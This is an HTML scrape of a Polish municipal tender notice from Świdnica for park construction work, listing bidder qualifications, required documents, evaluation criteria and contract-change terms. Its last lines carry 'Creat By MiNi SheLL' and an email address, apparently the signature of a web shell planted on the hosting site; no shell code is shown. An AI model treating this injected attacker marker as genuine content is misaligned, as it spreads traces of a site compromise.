<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia posiadającymi uprawnienia do pełnienia samodzielnych funkcji technicznych, odpowiednio do kierowania robotami budowlanymi 
bez ograniczeń w specjalnościach:
-   konstrukcyjno-budowlanej: osoba pełniąca funkcję kierownika budowy;
-   instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, 
    cieplnych,  wentylacyjnych i gazowych: osoba pełniąca funkcję kierownika robót 
    branży instalacji sanitarnych;
-  instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych: osoba 
    pełniąca funkcję kierownika robót branży instalacji elektrycznych;
wydane  zgodnie z   Rozporządzeniem   Ministra Infrastruktury i Rozwoju z dn. 11.09.2014 roku 
w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 poz.1278 ze zm.) należącymi do właściwej Izby lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 18 marca 2008 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394),
Wskazane powyżej osoby powinny posiadać minimum 3 letnie doświadczenie w pełnieniu samodzielnych funkcji technicznych;
oraz
-  architekta krajobrazu legitymującego się dyplomem wyższej uczelni
lub
- ogrodnika legitymującego się dyplomem wyższej uczelni,
  Wskazana osoba powinna posiadać minimum 3 letnie doświadczenie zawodowe  w zakresie zagospodarowywania lub utrzymania terenów zielonych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący sytuacji ekonomicznej i finansowej został spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500 tys. PLN (słownie: pięćset tysięcy złotych) oraz posiada środki finansowe lub zdolność kredytową w wysokości min. 500 tys. PLN (słownie: pięćset  tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że warunek dotyczący posiadania wiedzy i doświadczenia został spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie):
jednej  roboty budowlanej o wartości nie mniejszej niż 450.000,00 PLN brutto  obejmującej przebudowę lub  budowę  parków,   skwerów   lub   placów,   obiektów   małej   architektury    wraz   z infrastrukturą   techniczną obejmującą   roboty instalacyjne wod-kan i    oświetlenie   terenu oraz nasadzenia zieleni o powierzchni co  najmniej 0,3 ha  wraz z załączeniem dowodów dotyczących  tej roboty, określających, czy roboty te zostały wykonane w sposób   należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno - finansowej podmiotów trzecich, do oferty należy dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.19.Dodatkowo Wykonawca winien do oferty dołączyć:
7.19.1.Formularz ofertowy stanowiący (wzór zał. nr 1),
7.19.2.Oświadczenia i dokumenty, o których mowa w rozdz. 7 SWIZ,
7.19.3.Pełnomocnictwo, o którym mowa w rozdz. 6 pkt 6.4 SIWZ,
7.19.4.Dowód wniesienia wadium,
7.19.5.Parafowany wzór umowy o roboty budowlane (wzór zał. nr 8)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja jakości - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18. ISTOTNE DLA STRON POSTANOWIENIA UMOWY.
18.1.	Umowa zostanie zawarta na warunkach określonych we wzorze umowy, który stanowi załącznik nr 8 do SIWZ.
18.2.	Zakres świadczenia Wykonawcy wynikający z umowy będzie tożsamy z jego zobowiązaniem zawartym w ofercie złożonej w niniejszym postępowaniu o udzielenie zamówienia.
18.3.	Zamawiający dopuszcza zmiany umowy w tym, w szczególności wynagrodzenia, w formie pisemnej, aneksem zaakceptowanym przez obie strony umowy, pod rygorem nieważności w następujących przypadkach:
18.3.1.Zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna) np. z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez strony umowy, jeżeli te zmiany są korzystne dla Zamawiającego.
18.3.2.Wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia, np. jeżeli nastąpi zmiana stawki podatku od towarów i usług (VAT),
18.3.3.Zmiana sposobu świadczeń związana z:
a) aktualizacją lub zmianą dokumentacji projektowej (konieczność opracowania projektu zamiennego i zmiany pozwolenia na budowę),
b) odmiennymi od przyjętych w dokumentacji rozwiązań technicznych lub/i materiałowych w przypadku:
-gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
-zmiany obowiązującego prawa,
-niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej spowodowane zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
18.3.4.	Zmiana terminu wykonania zamówienia w przypadku:
a) wystąpienia kolizji z niezinwentaryzowanymi podziemnymi urządzeniami, instalacją lub obiektami infrastrukturalnymi,
b) wystąpienia szczególnie niekorzystnych warunków atmosferycznych w szczególności: 
-obfitych i długotrwałych opadów atmosferycznych, w szczególności śniegu i deszczu,
-niskich temperatur uniemożliwiających realizację umowy, 
-klęsk żywiołowych występujących na terenie objętym realizacją umowy.
c) spowodowane wstrzymaniem robót przez Zamawiającego,
d) spowodowane koniecznością wprowadzenia zmian w dokumentacji projektowej,
e) spowodowane innymi przyczynami zewnętrznymi niezależnymi od Zamawiającego 
i Wykonawcy skutkuje niemożliwością uzyskania stosowanych decyzji, zezwoleń 
i uzgodnień. 
18.3.5.	Zmiany osobowe, przy pomocy, których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w rozdz. 6 pkt 6.1 ppkt 6.1.3 SIWZ w przypadku: 
a) śmierci, choroby lub innych zdarzeń losowych tych osób,
b) nie wywiązywania się osób z obowiązków wynikających z umowy,
c) rezygnacji tych osób z wykonywania swoich obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.swidnica.bip-gov.info.pl/bip/glowna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Wydział Zamówień Publicznych i Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2015 godzina 09:00, miejsce: Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Wydział Zamówień Publicznych i Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com